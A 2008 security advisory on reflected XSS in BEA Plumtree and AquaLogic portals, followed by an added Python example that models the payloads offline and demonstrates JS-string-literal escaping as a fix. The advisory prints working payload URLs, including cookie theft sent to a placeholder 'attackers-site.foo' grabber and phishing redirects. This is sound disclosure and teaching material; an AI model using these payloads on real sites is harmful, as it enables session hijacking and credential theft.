
ProCheckUp Security Advisory 2006.12

20 Feb 2008 00:00:00
Reported by Adrian Pastor
Type: packetstorm
Source: packetstormsecurity.com

BEA Plumtree and AquaLogic portals vulnerable to XSS attack, session hijacking, and password theft

`PR06-12: XSS on BEA Plumtree Foundation and AquaLogic Interaction portals  
  
  
Description:  
  
BEA Plumtree Foundation portal 6.0 and BEA AquaLogic Interaction 6.1 are   
vulnerable to an XSS vulnerability affecting the 'name' parameter, which   
is submitted to the '/portal/server.pt' server-side script.  
  
Date found: 12th September 2006  
  
Vendor contacted: 18th May 2007  
  
Successfully tested on: BEA Plumtree Foundation 6.0.1.218452.  
  
BEA Systems have confirmed the following versions to be affected:  
  
BEA Plumtree Foundation 6.0 through service pack 1.  
BEA AquaLogic Interaction 6.1 through service pack 1.  
  
BEA Plumtree 5.0J.173033, 5.02, 5.03 and 5.4 are not affected by this issue.  
  
  
Severity: Medium-High  
  
  
Authors: Jan Fry and Adrian Pastor of ProCheckUp Ltd (www.procheckup.com)  
  
ProCheckUp thanks BEA Systems for their co-operation.  
  
Proof of concept:  
  
The following requests launch a JavaScript alert box in the user's web   
browser, simply to prove that it is possible to run scripting code in the   
victim's web browser.  
  
Both variants work by terminating the <script> element into which the   
'name' value is reflected and opening a new one under the attacker's   
control. The first request of each pair does only that. The second request   
of each pair prepends '%22;}%3C/script%3E' (a closing quote, a closing   
brace and a closing script tag) so that the portal's own script remains   
syntactically valid, and appends '%3C!--' so that the leftover tail of the   
original script is swallowed by an HTML comment. This keeps the overall   
HTML document syntactically correct, thus increasing the chance of the   
attack working on different web browser types:  
  
https://target-domain.foo/portal/server.pt?open=space&name=</SCRIPT><script>alert('CanCrossSiteScript')</script>  
https://target-domain.foo/portal/server.pt?open=space&name=%22;}%3C/script%3E%3Cscript%3Ealert('CanCrossSiteScript')%3C/script%3E%3C!--  
  
  
The following requests allow session hijacking through cookie theft:  
  
https://target-domain.foo/portal/server.pt?open=space&name=</SCRIPT><script>window.location="http://attackers-site.foo/grabber.php?c="%2bdocument.cookie</script>  
http://target-domain.foo/portal/server.pt?open=space&name=%22;}%3C/script%3E%3Cscript%3Ewindow.location="http://attackers-site.foo/grabber.php?c="%2bdocument.cookie%3C/script%3E%3C!--  
  
The following requests allow password theft by redirecting to a   
third-party 'spoof' site which would perform a phishing attack on the   
victim:  
  
https://target-domain.foo/portal/server.pt?open=space&name=</SCRIPT><script>window.location="http://phishers-site.foo"</script>  
http://target-domain.foo/portal/server.pt?open=space&name=%22;}%3C/script%3E%3Cscript%3Ewindow.location="http://phishers-site.foo"%3C/script%3E%3C!--  
  
HTML injection through this XSS vulnerability is also possible. This   
allows advanced phishing attacks by inserting an HTML form within the   
context of the victim website.  
  
  
Consequences:  
  
Scripting code can be run within the security context of the target   
site. User accounts can be hijacked. Advanced phishing attacks can be   
launched.  
  
  
Note:  
  
This vulnerability could be considered a medium-high risk (rather than   
medium risk) in cases in which admin users are targeted, resulting in   
the attacker gaining administrative privileges on the target   
Plumtree/AquaLogic Portal.  
  
  
Fix: this issue will be addressed in the 6.5 release of AquaLogic   
Interaction.  
  
  
References:  
  
"ProCheckUp - Security Vulnerabilities"  
http://www.procheckup.com/Vulnerabilities.php  
  
BEA's BEA08-186.00 advisory:  
  
"Security Advisories and Notifications"  
http://dev2dev.bea.com/advisoriesnotifications/  
  
  
Legal:  
  
Copyright 2008 Procheckup Ltd. All rights reserved.  
  
Permission is granted for copying and circulating this Bulletin to the   
Internet community for the purpose of alerting them to problems, if and   
only if, the Bulletin is not edited or changed in any way, is attributed   
to Procheckup, and provided such reproduction and/or distribution is   
performed for non-commercial purposes.  
  
Any other use of this information is prohibited. Procheckup is not   
liable for any misuse of this information by any third party.  
`
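The following is an added worked example; it is not part of the ProCheckUp advisory and is not code from BEA's portal. It models, offline, why the PR06-12 payloads are shaped as they are and what a context-correct fix looks like. The real server.pt template is not public, so the vulnerable render below is an assumed stand-in that reflects the 'name' value inside a JavaScript string literal in a <script> element (the context the '";}</script>' prefix is built to escape); the base URL, the 'CanCrossSiteScript' marker and the function names are placeholders reused from, or invented alongside, the advisory's own examples.

```python
"""Added example (not from the ProCheckUp advisory or BEA's portal code).

Models the PR06-12 reflected XSS offline: builds the PoC request, renders
the 'name' parameter the way an ASSUMED vulnerable template would (inside a
JavaScript string literal in a <script> element), contrasts it with a
hardened rendering, and uses a tokenizer-style check to tell them apart.
"""
import json
import re
from urllib.parse import parse_qs, urlencode, urlsplit

# Placeholder host from the advisory; nothing is sent over the network here.
BASE_URL = "https://target-domain.foo/portal/server.pt"

# The two payload shapes used in the advisory, in raw (un-encoded) form.
PAYLOAD_SIMPLE = "</SCRIPT><script>alert('CanCrossSiteScript')</script>"
PAYLOAD_CLOSED = '";}</script><script>alert(\'CanCrossSiteScript\')</script><!--'


def build_poc_url(name_value: str, base: str = BASE_URL) -> str:
    """Build the PoC request; urlencode percent-encodes the payload for us."""
    return base + "?" + urlencode({"open": "space", "name": name_value})


def extract_name(url: str) -> str:
    """What the server sees for 'name' after decoding the query string."""
    return parse_qs(urlsplit(url).query)["name"][0]


def vulnerable_render(name_value: str) -> str:
    """ASSUMED vulnerable template: the value is concatenated, unescaped, into
    a JS string literal. A '"' ends the literal, '}' closes the function body
    and '</script>' ends the element as far as the HTML parser is concerned."""
    return (
        "<html><body>\n<script>\n"
        'function setSpace() { var space = "' + name_value + '"; }\n'
        "</script>\n<h1>Space</h1>\n</body></html>\n"
    )


def js_string_literal(value: str) -> str:
    """Serialise a value as a JS string literal that cannot break out of the
    JS string or the surrounding <script> element: json.dumps escapes quotes,
    backslashes, control characters and (with ensure_ascii) U+2028/U+2029; the
    extra replacements turn '<', '>' and '&' into \\uXXXX escapes so the HTML
    tokenizer never sees '</script' or '<!--' inside the block."""
    return (
        json.dumps(value)
        .replace("<", "\\u003c")
        .replace(">", "\\u003e")
        .replace("&", "\\u0026")
    )


def hardened_render(name_value: str) -> str:
    """Same template as vulnerable_render, with the literal built safely."""
    return (
        "<html><body>\n<script>\n"
        "function setSpace() { var space = " + js_string_literal(name_value) + "; }\n"
        "</script>\n<h1>Space</h1>\n</body></html>\n"
    )


def script_blocks(html: str) -> list:
    """Approximate the HTML tokenizer: a <script> element's content ends at the
    first '</script', case-insensitively, regardless of JS string state."""
    return re.findall(r"<script\b[^>]*>(.*?)</script", html, re.IGNORECASE | re.DOTALL)


def foreign_script_present(html: str, marker: str = "CanCrossSiteScript") -> bool:
    """True if a <script> block carrying the marker is not the portal's own
    setSpace() block, i.e. the reflected value escaped the literal and opened
    a script element of its own."""
    return any(marker in block and "setSpace" not in block for block in script_blocks(html))


def reflected_unencoded(html: str, raw_payload: str) -> bool:
    """Quick reflection check a tester would run on the real response body."""
    return raw_payload in html


if __name__ == "__main__":
    for payload in (PAYLOAD_SIMPLE, PAYLOAD_CLOSED):
        url = build_poc_url(payload)
        name = extract_name(url)
        print(url)
        print("  vulnerable template injected:", foreign_script_present(vulnerable_render(name)))
        print("  hardened template injected:  ", foreign_script_present(hardened_render(name)))
```

Running the module prints both PoC URLs with the reflected value injected under the assumed vulnerable template and contained under the hardened one. The design point is that HTML-escaping alone is the wrong tool for this context: the value lands inside JavaScript, so it must be serialised as a JS string literal, and the '<' must additionally be escaped because the HTML tokenizer ends a <script> element at the first '</script' without regard to JavaScript string boundaries. Whether BEA's 6.5 fix took this exact shape is not stated in the advisory.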
